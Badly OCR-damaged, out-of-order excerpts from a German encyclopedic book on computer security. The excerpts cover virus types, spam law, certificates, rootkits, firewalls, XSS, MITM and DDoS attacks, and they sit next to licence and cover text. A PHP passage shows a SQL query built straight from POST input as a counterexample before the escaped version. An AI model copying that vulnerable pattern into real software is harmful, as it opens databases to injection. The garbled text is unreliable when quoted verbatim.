Wahrscheinlichkeit f
273. ersteckte Datei gleichen Namens mit der 32 Computervirus Endung com erstellen die dann nur das Virus enth lt Wird in der Kommandozeile von MS DOS ein Programmname ohne Endung einge geben sucht das Betriebssystem zuerst nach Programmen mit der Endung com und danach erst nach Programmen mit der Endung exe so dass der Sch dling vor dem eigentlichen Programm in der Suchreihenfolge er scheint und aufgerufen wird Der Sch dling f hrt nachdem er sich meist im Arbeitsspeicher festgesetzt hat das urspr ngliche Programm aus so dass der Benutzer oft nichts von der Infektion bemerkt berschreibende berschreibende Computerviren sind die einfachste Form von Viren wegen ihrer stark zerst renden Wirkung allerdings auch am leichtesten zu entdecken Wenn ein infiziertes Programm ausgef hrt wird sucht das Virus nach neuen infizierbaren Dateien und berschreibt entweder die ganze Datei oder nur einen Teil derselben meist den Anfang mit einer ben tigten L nge Die Wirtsdatei wird dabei irreparabel besch digt und funktioniert nicht mehr oder nicht mehr korrekt wodurch eine Infektion praktisch sofort auff llt Prepender Diese Art von Computerviren f gt sich am Anfang der Wirtsdatei ein Beim Ausf hren der Wirtsdatei wird zuerst das Virus ak tiv das sich weiterverbreitet oder seine Schadwirkung entfaltet Danach stellt das Virus im Arbeitsspeicher den Originalzustand des Wirtspro gramms her und f hrt dieses aus
274. erster Lesung den Entwurf eines Anti Spam Gesetzes beraten Das Anti Spam Gesetz soll das Teledienstegesetz um folgende Regelung erweitern Werden kommerzielle Kommunikationen per elektronischer Post E Mail versandt darf in der Kopf und Betreffzeile weder der Absender noch der kommerzielle Charakter der Nachricht verschleiert oder verheimlicht werden Ein Verschleiern oder Verheimlichen liegt insbesondere dann vor wenn die Kopf oder Betreffzeile absichtlich so gestaltet ist dass der Emp f nger vor Einsichtnahme in den Inhalt der Kommunikation keine oder irref hrende Informationen ber die tats chliche Identit t des Absenders oder den kommerziellen Charakter der Nachricht erh lt Ein Versto gegen diese Regelung soll als Ordnungswidrigkeit mit ei ner Geldbu e bis zu 50 000 Euro geahndet werden Die Regelung w rde allerdings nur die Irref hrung ber Absender und Inhalt der Mail verbie ten nicht aber das unverlangte Zusenden von Werbe E Mails selbst 204 Spam Rechtslage in anderen L ndern Im brigen Europa ist die Rechtslage durch die Richtlinie des Europ ischen Parlaments und des Rates ber die Verarbeitung personenbezogener Daten und den Schutz der Privatsph re in der elektronischen Kommunikation vom 12 Juli 2002 die bis Ende 2003 von den EU Mitgliedstaaten in nationales Recht umzusetzen war im Ergebnis vergleichbar Die Zusendung von E Mail Werbung ist nur dann erlaubt wenn der Empf nger vorher eingewi
275. ersuchen ei nige Insider seit 1990 eine strickte Trennung zwischen Hackern und Cra ckern zu etablieren Cracker und Crasher sind deren Definition zufolge also keine Hacker Die Reduzierung der Hackerdefinition auf eine Gruppe von Gutmenschen ist jedoch sehr umstritten Nicht zuletzt die Tatsache dass eine Unterteilung in gut und b se allenfalls vage und subjektiv sein kann aber auch die Auffassung dass eine solche Einschr nkung zu dogmatisch ist verhindert bislang eine fl chendeckende Akzeptanz die ser Definition Parallel dazu existiert seit Mitte der 1990er auch die Auffassung dass die gegenw rtige Maxime des Hackers darin bestehe Programme zu schreiben deren Quellcode f r die Allgemeinheit offen zug nglich ist Demnach w re jeder Open Source Programmierer ein Hacker Andere meinen dass unabh ngig vom Open Source jeder Entwickler von Freeware ein Hacker ist Auch hier ist keine Rede von Sicherheitsbar rieren und Technik Hacken bedeutet f r viele Insider vor allem auch Wissen und Einblick in das Funktionieren von Technologie Der CCC Chaos Computer Club versteht unter Hacken einen kre ativen Umgang mit Technik jeglicher Art Ein Beispiel von Herwart Hol land Moritz alias Wau Holland einer der gro en Leitfiguren der dama ligen Hackerszene Wenn man die Kaffeemaschine benutzt weil der Herd nicht geht um Wasser hei zu machen welches dazu verwendet wird die Fertigmischung f r Kartoffelbrei zuzubereiten
276. ert und k nnen somit mit dem ffentlichen Schl ssel der Zertifizierungsstel le berpr ft werden Zertifikate f r Schl ssel die nicht mehr sicher sind k nnen ber eine so genannte Certificate Revocation List gesperrt wer den Um die Echtheit des Zertifikates zu garantieren wird dem Zertifikat eine digitale Signatur einer vertrauensw rdigen Organisation oder In stanz z B eine Beh rde aufgepr gt Durch deren Signatur kann die In tegrit t und Echtheit des Zertifikates nachgewiesen werden Da auch der ffentliche Schl ssel einer Zertifizierungsstelle schlie lich mittels eines Zertifikats berpr fbar sein muss ergibt sich die Notwendigkeit einer obersten Zertifizierungsinstanz In Deutschland bernimmt die Bundes netzagentur f r Elektrizit t Gas Telekommunikation Post und Eisen bahnen ehemals RegTP diese Aufgabe Die Bundesnetzagentur f hrt eine Liste aller akkreditierten Zertifizierungsdiensteanbieter Beispiel Siehe folgende Doppelseite Ausstellung eines Zertifikates durch eine Zertifizierungsstelle Ein Zertifikat wird von einer Zertifizierungsstelle ausgestellt Diese ist oftmals Teil eines Trust Centers Je nach Qualit tsanforderung an das Zertifikat verl uft der Ausstellungsprozess auf folgende Weise Der Interessent muss sich bei der Registration Authority RA pers n lich registrieren An diesem Punkt gibt es die gr ten Qualit tsunterschiede zwischen Zertifikaten F r manche Zertifikate ist es erf
277. erung des Zugriffes von au en Verf gbarkeit Nutzbarkeit Zu beachten ist dass Computersicherheit zwar eine wichtige Voraus setzung f r Datenschutz und Datensicherheit ist alleine aber nicht aus reicht Zus tzlich zur Sicherung des Computersystems m ssen auch auf organisatorischer und personeller Ebene Vorkehrungen getroffen werden Beispiele f r die Missachtung hiervon sind achtlos weitergegebene oder schlecht gew hlte Passw rter oder der Diebstahl ganzer Rechenanlagen 10 11 berblick Geschichte In den Kindertagen des Personal Computers verstand man unter Computersicherheit die Sicherstellung der korrekten Funktionalit t von Hardware Ausfall von z B Bandlaufwerken oder anderen mechanischen Bauteilen und Software richtige Installation und Wartung von Program men Mit der Zeit nderten sich die Anforderungen an die Computer In ternet Speichermedien die Aufgaben zur Computersicherheit mussten anders gestaltet werden Somit bleibt der Begriff der Computersicherheit wandelbar und Spiegel der momentanen technologischen Welt Viren W rmer trojanische Pferde W hrend im Firmenumfeld die ganze Themenbreite der Computersicher heit Beachtung findet verbinden viele Privatanwender mit dem Begriff prim r den Schutz vor Viren oder Spyware Die ersten Computerviren waren noch recht harmlos und dienten le diglich dem Aufzeigen diverser Schwachstellen von C
278. es nicht ins Geh use eingebaut wird Dies w re dann aber wieder mit einem erh hten Aufwand verbunden In Deutschland kann der heimliche Einsatz von Keyloggern an frem den Computern als Aussp hen von Daten gem 202a Strafgesetzbuch strafbar sein Unternehmen die Keylogger an den Firmencomputern ein setzen wollen m ssen zuvor die Zustimmung des Betriebsrats einholen Quelle http de wikipedia org wiki Keylogger Historie 16 6 04 Anonym angelegt danach bearbeitet von den Hauptautoren Forevermore Cherubino D anonym 12 1 06 1 2 06 WikiPress Redaktion Rootkit Ein Rootkit engl etwa Administratorenausr stung ist eine Sammlung von Softwarewerkzeugen die nach dem Einbruch in ein Computersystem auf dem kompromittierten System installiert werden um zukiinftige Lo gins des Eindringlings zu verbergen Prozesse zu verstecken Daten zu ko pieren und Eingaben mitzuschneiden Der Begriff ist heute nicht mehr allein auf unixbasierte Betriebssysteme beschr nkt da es inzwischen Werkzeugk sten gibt die hnliche Funktio nalit t auch f r Nicht Unix Systeme bieten auch wenn diese keinen Root 83 Software Login des Administrators haben Die Tarnfunktion des Rootkits erfolgt hier vor allem hinsichtlich parallel laufender Antivirensoftware vor de nen die Dateien und Prozesse des Angreifers versteckt werden Die Firma Sony BMG kam in die Schlagzeilen und musste diverse Mu sik CDs zur ckrufen nachdem im Weblog von Sy
279. esamte Motherboard muss ausgetauscht werden 37 Viren W rmer Trojaner Wirtschaftliche Sch den Der wirtschaftliche Schaden durch Computerviren ist geringer als der Schaden durch Computerw rmer Grund daf r ist dass sich Viren nur sehr langsam verbreiten k nnen und dadurch oft nur lokal verbreitet sind Ein weiterer Grund warum der wirtschaftliche Schaden bei Com puterviren nicht so hoch ist ist die Tatsache dass sie den angegriffenen Computer oder die angegriffene Datei im Allgemeinen f r einen l ngeren Zeitraum brauchen um sich effektiv verbreiten zu k nnen Computervi ren die Daten sofort zerst ren sind sehr ineffektiv da sie mit dieser Akti on auch ihren eigenen Lebensraum zerst ren Im Zeitalter der DOS Viren gab es trotzdem einige Viren die erhebli chen Schaden angerichtet haben Ein Beispiel ist das Virus DataCrime das gesamte Datenbest nde vernichtet hat Viele Regierungen reagierten auf dieses Virus und verabschiedeten Gesetze die das Verbreiten von Com puterviren zu einer Straftat machen Ein Virus mit hohem wirtschaftlichen Schaden war Win32 CIH auch Tschernobyl Virus genannt nach dem Atomunfall von Tschernobyl vom 26 April 1986 das sich gro fl chig verbreitete und am 26 April 2000 den Dateninhalt von mehr als 2000 BIOS Chips in S dkorea zerst rte Laut Antivirenhersteller Kaspersky sollen im Jahr davor sogar 3000 PCs betroffen gewesen sein Ein weiterer wirtschaftlicher Faktor war fr her
280. esch tzt werden 123 Software Den Kern der neuen Unternehmung bilden die Unternehmen AMD Hew lett Packard IBM Intel Microsoft Sony und Sun Ziel Die Philosophie der TCG ist Computer gegen Softwareangriffe zu sichern das hei t Software und Daten vor der Kompromittierung durch Viren Trojanische Pferde und jede andere Form von Malware zu sch tzen bzw eine eventuelle Kompromittierung zumindest detektierbar zu machen Dies wird erreicht indem zuerst der Zustand d h der Hashwert des BIOS selbst und aller nachfolgend geladener Software manipulationssicher in tern gespeichert wird Mit dem Ergebnis dieser berpr fung kann der Inhaber des Computers den Zustand seines Systems gegen ber anderen internen oder externen Systemen nachweisen Dabei ist der Rechner nicht in der Lage falsche Aussagen ber seinen Zustand zu machen Das Laden und die Ausf hrung von Software wird durch Mechanismen der TCG je doch nicht verhindert Die Bewertung des Systemzustands und m gliche Reaktionen liegen allein im Ermessen der die Ergebnisse auswertenden Instanz Wer immer diese Instanz auch sein mag Organisationsstrukur Die neue Organisationsstruktur der TCG umgeht die Beschr nkung der Vorg ngerorganisation TCPA die Entscheidungen nur einstimmig f llen konnte In der TCG gibt es drei Gruppen von Mitgliedern Die Einordnung in eine der Gruppen bringt neben den unterschiedlichen Mitgliedsbeitr gen auch unterschiedliche Rechte mit sich
281. estet werden darf Danach kann die Software entweder k uflich erworben wer 103 Software den oder als limitierte Edition weiter genutzt werden In der kostenlosen Version fehlen Content Filter hostbasiertes IDS Fernwartungszugang so wie die M glichkeit die Firewall auf einem Router einzusetzen Die Firewall entstammt der Tiny Personal Firewall Die Firma Kerio Technologies Inc erwarb die Rechte an dem Produkt entwickelte es wei ter und ver ffentlichte im M rz 2002 die stabile Version 2 1 unter dem Namen Kerio Personal Firewall Die Software war Freeware Mit Version 4 wurde 2003 der Funktionsumfang von Kerio stark erweitert und eine kommerzielle Version eingef hrt Im September 2005 stellte Kerio die Entwicklung des Produkts ein Kerio Mitarbeiter begr nden dies im Pro dukt Forum damit dass die Firewall nicht profitabel sei Ein Firmenspre cher erkl rte man wolle sich auf die Entwicklung des Kerio MailServers und der WinRoute Firewalls konzentrieren Im Dezember 2005 wurde die Kerio Personal Firewall von der Firma Sunbelt Software bernommen und ist seither unter dem Namen Sunbelt Kerio Personal Firewall erh ltlich Norton Personal Firewall Die Norton Personal Firewall ist Bestandteil des kommerziellen Softwarepakets Norton Internet Security Dieses ent h lt neben der Desktop Firewall auch ein Antivirenprogramm und ei nen Spamfilter Versionen existieren f r die Betriebssysteme Windows 2000 SP3 und XP Norton Perso
282. et 222 Cross Site Scripting Gef hrlich wird dies wenn die Website auf der der Code untergebracht wurde im lokalen Browser mit besonderen Sicherheitsrechten Privile gien ausgestattetist Der Code kann dann in Abh ngigkeit von der M ch tigkeit der Skriptsprache verschiedene Dinge tun die mit den Rechten des lokalen Benutzers m glich sind Alternativ kann der Code auch Cookies mit Anmeldeinformationen stehlen Da aus Bequemlichkeitsgr nden auf Microsoft Windows Systemen der lokale Benutzer h ufig mit Administratorrechten ausgestattet ist ist dies bereits eine potenziell sehr gef hrliche Konstellation Aber auch ohne Administratorrechte kann der Angreifer versuchen durch Ausnutzung von Sicherheitsl cken bei der Ausf hrung der betreffenden Skriptsprache diese Rechte zu erlangen Serverseitig Beim serverseitigen Cross Site Scripting wird versucht Code auf dem Server auszuf hren Dies ist z B durch PHPs include Anweisungen m glich Unter PHP ist es m glich Dateien von anderen Rechnern einzubinden also auch von einem Rechner eines Angreifers Etliche Programmiersprachen wie Perl bieten die M glichkeit lokal Pro gramme ber eine Shell auszuf hren Wird ein lokales Programm mit benutzermanipulierbaren Parametern aufgerufen und die Parameter nicht entsprechend gefiltert ist es m glich weitere Programme aufzu rufen So k nnen etwa Dateien ge ndert oder sensible Daten ausgesp ht werden Neuerdings werden Web
283. et pstmt executeQuery 219 Angriffe Der Mehraufwand an Schreibarbeit durch die Verwendung der Prepared Statement Klasse zahlt sich jedoch durch einen positiven Performance gewinn aus da durch die Angaben bereits im Voraus eine Optimierung durchgef hrt werden kann PHP In PHP wird zu diesem Zweck die Funktion mysql_real_escape_ string verwendet die jedoch lediglich f r eine MySQL Verbindung be nutzbar ist Wird eine andere Datenbank benutzt so steht diese Funktion nicht zur Verf gung jedoch h lt PHP f r fast jede Datenbank eine sol che Escape Funktion bereit Die PHP Oracle Funktionen beispielsweise besitzen keine Escapefunktion hingegen k nnen sie PreparedStatements verwenden was bei der beliebten MySQL Datenbank erst mit den Funkti onen von MySQLi m glich geworden ist Anstatt Sabfrage SELECT spaltel FROM tabelle WHERE spalte2 _ POST spalte2Wert query mysql _ query abfrage or die Datenbankabfrage ist fehlgeschlagen sollte Folgendes verwendet werden Sabfrage SELECT spaltel FROM tabelle WHERE spalte2 mysql _ real _ escape _ string _ POST spalte2Wert query mysql _ query Sabfrage or die Datenbankabfrage ist fehlgeschlagen Falls man eine Einflussm glichkeit auf die Konfigurationsdatei php ini hat kann man auch die Option magic_quotes_gpc off auf magic_ quotes_gpc on stellen Dies ist jedoch an sich nicht empfehlenswert da manc
284. etfilter F r solch einfache Aufgaben wie das Vergleichen von Quell und oder Zieladresse der Pakete die die Firewall passieren ist der Paketfilter zust ndig Er hat die Aufgabe bestimmte Filterungen oder Reglementierungen im Datenverkehr vorzunehmen Wenn man sich das Internet als eine gigantische Ansammlung von H usern vor stellt dann stellen die IP Adressen sozusagen die Hausnummern dar Stra ennamen sind in der Welt des Internets unbekannt Unter einer bestimmten Hausnummer kann man nun direkt mit einem Rechner kommunizieren egal wo sich dieser Rechner befindet In den einzel nen Etagen dieser Rechner wohnen nun die verschiedenen Dienste wie HTTP FTP oder SSH Die einzelnen Etagen sind mit einer Nummer ge kennzeichnet die man auch Port nennt Ein Paketfilter kann nun ver schiedene Etagen Ports f r die Besucher aus dem Internet sperren d h jede Verbindung aus dem Internet wird an der Haust r schon abgewie sen Durch die entsprechende Konfiguration einer Firewall kann so ein Rechnernetz vor Angriffen und oder Zugriffen gesch tzt werden Ein Paketfilter definiert Regeln welche festlegen ob einzelne oder zusam menh ngende Pakete das Zugangsschutzsystem passieren d rfen oder abgeblockt werden Eine solche Regel w re zum Beispiel Verwirf alle Pakete die von der IP Adresse 1 2 3 4 kommen Eine solche Regel ist programmtechnisch einfach Es ist nur ein Zahlenwert zu vergleichen Nur nicht pragmatisch Die Anzahl dieser Nummern
285. etrifft Programme oder Protokolle wie z B IRC ICQ oder den Windows Nachrichtendienst SPIT Spam over Internet Te lephony sind unerw nschte Anrufe per VoIP Auch die Kommunikation per Handy ist von Spam betroffen einerseits durch verst rkten Einsatz von Mobile Marketing zur Marktforschung an dererseits durch unerw nschte SMS die in Japan schon bis zu 90 aller elektronischen Nachrichten ausmachen Usenet Mitte der 1990er Jahre als noch die wenigsten Menschen und Unterneh men eine E Mail Adresse hatten und schon allein von daher massenhaf ter E Mail Versand noch nicht m glich war fand das Wort Spam seinen Weg ins Usenet Es sollte die T tigkeit Einzelner bezeichnen ihre immer gleichlautende Werbung in tausende von Newsgroups zu posten ohne sich um die thematische Zweckentfremdung zu scheren oder sich f r die nachfolgenden Diskussionen zu interessieren Der allererste Spam der extrem viele Newsgroups verunreinigte war 1994 eine Werbekampagne des Rechtsanwaltsb ros Canter amp Siegel USA die daf r warb bei der Teilnahme an der Verlosung von Green cards behilflich zu sein Im Zuge dieses Spams fassten die ersten Benutzer den Mut ihn zu can celn also zu l schen obwohl es illegal ist anderer Leute Beitr ge zu can celn Sp ter ergab eine Umfrage Strawpoll im Usenet dass ca 90 aller Benutzerinnen und Benutzer das Canceln von Spam begr en Die Flut an Spam Artikeln vor allem in den sexuellen Diskussions Ne
286. etz voraussetzt ist das Vorspielen eines falschen DHCP Servers Durch Angabe einer falschen Gateway Adresse zum Internet kann die Kommunikation durch einen Rechner des Angreifers geleitet werden Ebenfalls m glich ist im speziellen Fall des ffentlichen WLAN Hot spots das Vort uschen eines falschen WLAN Access Points Auch in diesem Fall leitet der falsche Access Point die Daten dann zum korrek ten Access Point weiter 227 Angriffe Durch DNS Cache Poisoning gibt der Angreifer eine falsche Zieladres se f r die Internet Kommunikation vor und leitet dadurch den Verkehr durch seinen eigenen Rechner Poison Routing Am effektivsten l sst sich dieser Angriffsform mit einer Verschl sselung der Datenpakete entgegenwirken wobei allerdings die Fingerprints der Schl ssel ber ein zuverl ssiges Medium verifiziert werden sollten D h es muss eine gegenseitige Authentifizierung stattfinden die beiden Kom munikationspartner m ssen auf anderem Wege ihre digitalen Zertifikate oder einen gemeinsamen Schl ssel ausgetauscht haben d h sie m ssen sich kennen Sonst kann z B ein Angreifer bei einer ersten SSL oder SSH Verbindung beiden Opfern falsche Schl ssel vort uschen und somit auch den verschl sselten Datenverkehr mitlesen Ein bekanntes Tool f r MITM Angriffe ist Ettercap Quelle http de wikipedia org wiki Man In The Middle Angriff Historie 9 6 03 Anonym angelegt danach bearbeitet von den Hauptautoren Philippscha
287. etzwerk bertragen werden Wenn die Nachricht beim Empf nger eintrifft kann dieser berpr fen ob sie korrekt angekommen ist Durch Division durch das Generatorpolynom kann jetzt die fehlerhaf te bertragung erkannt werden Ein Beispiel f r eine fehlerhafte Nachricht 11110110111110 Das Generatorpolynom wie oben 10011 11110110111110 00001110 Der Rest der Division 1110 ist ungleich Null Also ist ein Fehler aufge treten Bei der berpr fung auf Richtigkeit k nnen folgende F lle auf treten Der Rest der Division ist Null und die Nachricht ist richtig Der Rest der Division ist Null und die Nachricht ist fehlerhaft dieser Fall kann durchaus vorkommen wenn die Nachricht an mehreren Stel len verf lscht wird Der Rest der Division ist ungleich Null und die Nachricht ist fehler haft 261 WLAN Implementierung Das CRC Verfahren l sst sich sowohl in einfachen Hardware Bausteinen als auch in Software realisieren Verwendet wird ein Schieberegister mit n Bits etwa ein 32 Bit Schieberegister bei CRC 32 und ein Bit Datenstrom String beliebiger L nge Pseudo Code des Algorithmus h chstwertiges Bit ganz links Schieberegister 0000 Startwert solange Bits im String verbleiben falls das am weitesten links stehende Bit vom Schiebere gister ungleich zum n chsten Bit aus dem String ist Schieberegister Schieberegister linksschieben um rechtes Bit 0 xor CRC Polynom andernfalls Schiebe
288. ewall kann aber den un erw nschten Zugriff auf Dienste filtern die der Benutzer nicht beenden kann oder m chte oder von denen er gar nicht bemerkt hat dass sie lau fen Personal Firewalls bestehen aus Software die auch fehlerhaft sein kann Manchmal werden Schwachstellen in Personal Firewalls bekannt die es erst erm glichen zu sch tzende Systeme ber das Netz anzugrei fen So wurden im M rz 2004 nicht rechtzeitig aktualisierte Versionen von BlackICE und RealSecure Opfer des Witty Wurms 99 Software Schutz vor Angriffen von innen H ufig gelangt Schadsoftware als Trojanisches Pferd auf den Rechner Sie wird vom Benutzer der von der Sch dlichkeit des Programms nichts ahnt ausgef hrt Es z hlt nicht zu den Aufgaben einer Personal Firewall vor dem Ausf hren eines Trojani schen Pferdes zu sch tzen Wenn die Schadsoftware mit eingeschr nkten Benutzerrechten ausge f hrt wird kann eine PFW oft verhindern dass die Malware eine Hin tert r engl Backdoor auf dem System einrichtet Erfahrene Benutzer k nnen aus den Logmeldungen der Personal Firewall den Versuch eine Backdoor einzurichten erkennen Meist kann jedoch nicht mit Sicherheit gesagt werden ob die von der Personal Firewall vereitelte Aktion die ein zige Funktion der Schadsoftware ist oder ob weitere unbemerkte Mani pulationen am Betriebssystem vorgenommen wurden In diesem Fall gilt das System als kompromittiert Ein solches kann auch durch eine Personal
289. ezeichnet man Computerprogramme die eine offene oder verdeckte Schadfunkti on aufweisen und blicherweise mit dem Ziel entwickelt werden Schaden anzurichten Schadfunktionen k nnen zum Beispiel die Manipulation oder das L schen von Dateien oder die Kompromittierung der Sicher heitseinrichtungen wie z B Firewalls und Antivirenprogramme ei nes Computers sein Malware bezeichnet keine fehlerhafte Software auch wenn diese Scha den anrichten kann Es existieren folgende Typen von Malware Computerviren sind die lteste Art der Malware sie verbreiten sich indem sie Kopien von sich selbst in Programme Dokumente oder Da tentr ger schreiben Ein Computerwurm hnelt einem Computervirus verbreitet sich aber direkt ber Netzwerke wie das Internet und versucht in andere Computer einzudringen Ein Trojanisches Pferd ist eine Kombination eines manchmal nur scheinbar n tzlichen Wirtsprogrammes mit einem versteckt arbeiten den b sartigen Teil oft Spyware oder eine Backdoor Ein Trojanisches Pferd verbreitet sich nicht selbst sondern wirbt mit der N tzlichkeit des Wirtsprogrammes f r seine Installation durch den Benutzer Eine Backdoor ist ein blicherweise durch Viren W rmer oder Tro janische Pferde installiertes Programm das Dritten einen unbefugten Zugang Hintert r zum Computer verschafft jedoch versteckt und unter Umgehung der blichen Sicherheitseinrichtungen Backdoors werden oft f r Denial of Service A
290. ezifischen Schadensfunktionen Das Virus vergr ert die befalle nen Dateien um 238 Bytes Quelle http de wikipedia org wiki Angarsk_ Computervirus Historie 29 5 04 Angelegt von John Doe danach bearbeitet von dem Hauptautoren John Doe 12 1 06 1 2 06 WikiPress Redaktion 44 Bootvirus Bootvirus Ein Bootvirus ist ein Computervirus der beim Start des Rechners Boo ten aktiv wird noch bevor das Betriebssystem komplett geladen ist Auf Disketten sitzt der Virus zumindest teilweise im Bootsektor selbst Dis ketten die keine Dateien enthalten k nnen also infiziert sein Auf Fest platten kann der Virus im Master Boot Record MBR oder im logischen Bootsektor sitzen Bootviren sind die ltesten Computerviren berhaupt Diese Viren waren bis 1995 die meistverbreitete Form von Viren Ein Bootsektorvirus infiziert den Bootsektor von Disketten und Festplatten sowie den Master Boot Record MBR einer Festplatte Der Bootsektor ist der erste physische Teil einer Diskette und einen Sektor 512 Byte gro Der Bootsektor wird von Startdisketten verwendet um von der Diskette booten zu k nnen je doch hat jede Diskette und Festplatte einen Bootsektor oder einen MBR Bootsektorviren nutzen die Tatsache aus dass der Bootsektor immer als erstes geladen wird Will ein Benutzer von einer infizierten Startdiskette booten oder vergisst er eine infizierte Diskette im Diskettenlaufwerk beim Start des Computers greift das BIOS bei entsprechen
291. ezogenen Daten auf Vorrat verst t ge gen den so genannten Erforderlichkeitsgrundsatz wonach personenbe zogene Daten grunds tzlich nur dann gespeichert werden d rfen wenn dies zu einem bestimmten gesetzlich zugelassenen Zweck erforderlich ist Daten deren Speicherung nicht oder nicht mehr erforderlich ist m ssen gel scht werden Vorratsdatenspeicherung in der Telekommunikation In der politischen Diskussion wird der Begriff Vorratsdatenspeicherung mittlerweile als Synonym f r die Speicherung von Telekommunikations daten f r Strafverfolgungszwecke verwendet Telekommunikationsan bieter sollen verpflichtet werden die f r Abrechnungszwecke erhobenen Verkehrsdaten ihrer Kunden f r einen bestimmten Zeitraum zu speichern Mindestspeicherfrist damit Polizei und Nachrichtendienste darauf zu greifen k nnen Als Eingriff in das verfassungsrechtlich gesch tzte Fernmeldegeheim nis ist die Vorratsdatenspeicherung u erst umstritten Au erdem wird von Kritikern angef hrt dass der Informantenschutz f r Journalisten eingeschr nkt wird und somit kritische Berichtserstattung erschwert wird Dies k me faktisch einer Einschr nkung der Pressefreiheit gleich Nach bisherigem Recht m ssen die Anbieter die Verkehrsdaten nach Beendigung der Verbindung unverz glich l schen es sei denn sie ben tigen die Daten zu Abrechnungszwecken 96 Absatz 2 Telekommunika tionsgesetz In der Praxis bewahren die Anbieter die Verkehrsdaten eine
292. f den Sinn dieser Lizenz aus 2 UNVER NDERTE KOPIEN Sie d rfen das Dokument in jedem Medium sowohl kommerziell als auch nicht kommerziell vervielf ltigen und verbreiten Voraussetzung daf r ist dass diese Lizenz die Copyright Hinweise sowie der Lizenzhinweis der besagt dass diese Lizenz auf das Dokument anzuwenden ist in allen Kopien wiedergegeben werden und dass dieser Lizenz keine weiteren Bedingungen hinzugef gt werden Sie d rfen in den Kopien die Sie erstellen oder verbreiten keinerlei technische Ma nahmen treffen um das Lesen oder die sp tere Vervielf ltigung der Kopien zu erschweren oder zu kontrollieren Dennoch d rfen Sie Gegenleistungen f r Kopien akzeptieren Wenn Sie eine entsprechend gro e Anzahl von Kopien vertreiben m ssen Sie zus tzlich die Bestimmungen in Paragraph 3 beachten Sie k nnen au erdem unter denselben oben genannten Bedingungen Kopien verleihen und ffentlich wieder geben 3 KOPIEN IN ST CKZAHLEN Wenn Sie mehr als 100 gedruckte Kopien des Dokuments oder Kopien in Medien die blicherweise gedruckte Umschl ge haben ver ffentlichen und der Lizenzhinweis des Dokuments Umschlagtexte verlangt m ssen die Kopien in Umschl gen verpackt sein auf denen diese Umschlagtexte deutlich zu lesen sind die vorderen Umschlagtexte auf dem vorderen Umschlag die hinteren Umschlagtexte auf dem hinteren Umschlag Auf beiden Umschl gen m ssen Sie au erdem deutlich lesbar als Herausgeber dieser Kopien genan
293. fahren werden in diesem Buch beschrieben und zugleich zeigt es die M glichkeiten auf mit denen sich der Nutzer des Computers vor den Attacken sch tzen kann vom Spamfilter ber die Antivirensoftware bis zu den Themen Firewall und Verschl sselung WIKIPEDIA Die freie Enzyklop die Die Inhalte dieses WikiPress Buchs entstammen der deutschsprachigen Wikipedia der freien Enzyklop die Autoren der Wikipedia verzichten grunds tzlich auf ein pers nliches Honorar WikiPress unterst tzt mit einem Teil der Erl se dieses Buchs die Wikipedia und ihre Schwesterprojekte durch finanzielle Zuwendungen an den Verein Wikimedia Deutschland Gesellschaft zur F rderung Freien Wissens e V http www wikimedia de ISBN 10 3 8b640 007 1 ISBN 13 978 3 86640 007 8 917838661400078 7 9001 8 20 ca WikiPress erscheint in der Zenodot Verlagsgesellschaft mbH Weitere Informationen unter http www zenodot de
294. ffe die auf die Belegung bestimmter Dienste zielen Die auf dem Server laufenden Dienste werden durch eine unnormal hohe Inan spruchnahme oder speziell pr parierte Datenpakete blockiert Oft wer den hierf r Fehler oder Schwachstellen der auf dem Server laufenden Software ausgenutzt Neben der Belegung von Bandbreite oder anderer Netzwerkressour cen kann der Angriff durch Mail und Kompressionsbomben auch auf Festplattenplatz und Speicher zielen Das betroffene System wird durch den fehlenden freien Speicher betriebsunfahig In einem Angriffsszenario sind auch beliebige Mischformen denkbar In der Regel w hlt der Angreifer ein Konzept mit dem er bei geringstem ei genen Ressourceneinsatz die gr tm gliche Wirkung beim Opfer erzielen kann 209 Angriffe Beispiele Januar 2006 DDos gegen den Server von Alluwant de gro er Home page Ausfall Dezember 2005 DDos gegen die Server von dialerschutz de computerbe trug de gulli com und antispam de Ermittlungsbeh rden eingeschaltet September Oktober 2005 DDos gegen die Server von Anbieter crowfire de 1000 Euro Belohnung f r das Fassen des T ters oder L sung des Problems September 2005 DDos gegen antispam de und computerbetrug de August 2005 mehrere DDoS Bundeskriminalamt eingeschaltet z B Fluxx AG Ziel eines gescheiterten Erpressungsversuchs um 40 000 Euro Mai 2005 DDoS gegen antispam de GameSurge IRC Netzwerk April 2005 Das Onlinespielenetzwerk PlayOnline auf dem unter
295. ffentlichen Schl ssel signiert Andere Benutzer k nnen aufgrund dieses Zertifikates entscheiden ob auch sie darauf vertrauen wollen dass der Schl ssel zum angegebenen Benutzer geh rt oder nicht Je mehr Zertifikate an einem Schl ssel h ngen desto sicherer kann man sich sein dass dieser Schl ssel tats chlich dem angegebenen Eigent mer geh rt Ein Zertifikat kann muss aber nicht auch von einer Zertifizierungsstelle erzeugt werden Es ist anzuraten eine Zertifizierungstelle zu nutzen da diese Zertifikate ein hohes Ma an Vertrauen in der breiten Masse der Nutzer genie en Zertifikatstypen nach deutschem Signaturgesetz EU Richtlinie Das deutsche Signaturgesetz SigG http www netlaw de gesetze sigg htm bzw die EU Richtlinie bewerten die Qualitat von Zertifikaten in acht Stufen von denen nur drei f r eine n here Betrachtung von Bedeutung sind 146 Digitales Zertifikat Einfache und fortgeschrittene Zertifikate Die einfachen und fortge schrittenen digitalen Zertifikate sind v llig unreguliert und finden z B bei PGP GnuPG Anwendung Je nach Zertifizierungsstelle werden ande re Informationen in ein einfaches bzw fortgeschrittenes Zertifikat inte griert Beispielsweise E Mail Adresse des Zertifikatinhabers erweiterte textliche Informationen z B Anschrift des Zertifikat Inha bers Diese Zertifikate werden vom Gesetzgeber nicht mit einer eigenh ndigen Unterschrift gleichgesetzt Qualifizierte Zertifikate Q
